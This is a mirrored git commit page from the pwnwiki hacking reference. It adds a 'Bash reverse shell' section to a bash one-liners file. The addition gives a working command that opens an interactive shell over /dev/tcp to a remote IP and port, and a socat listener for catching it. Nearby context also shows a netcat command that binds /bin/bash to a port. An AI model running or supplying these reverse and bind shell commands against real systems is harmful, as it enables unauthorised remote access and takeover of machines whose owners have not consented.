mirror of
https://github.com/oXis/pwnwiki.github.io.git
synced 2025-10-29 16:56:59 +00:00
Merge pull request #83 from Oneiroi/master
bash one liner reverse tcp using /dev/tcp into -> scripting/bash.md
This commit is contained in:
commit
5623335766
@ -113,6 +113,21 @@ nc -e /bin/bash -lp *port*
|
|||||||
cat /proc/cpuinfo
|
cat /proc/cpuinfo
|
||||||
```
|
```
|
||||||
|
|
||||||
|
**Bash reverse shell** (@icleus)
|
||||||
|
|
||||||
|
Works on all (recent) distributions where egress filtering is not in place / quite open, use this to reverse connect to your listening host.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &
|
||||||
|
```
|
||||||
|
|
||||||
|
I find this best works with a socat listener due to the readline support.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
socat readline TCP-LISTEN:1234
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Credits
|
Credits
|
||||||
-----------
|
-----------
|
||||||
Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)
|
Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user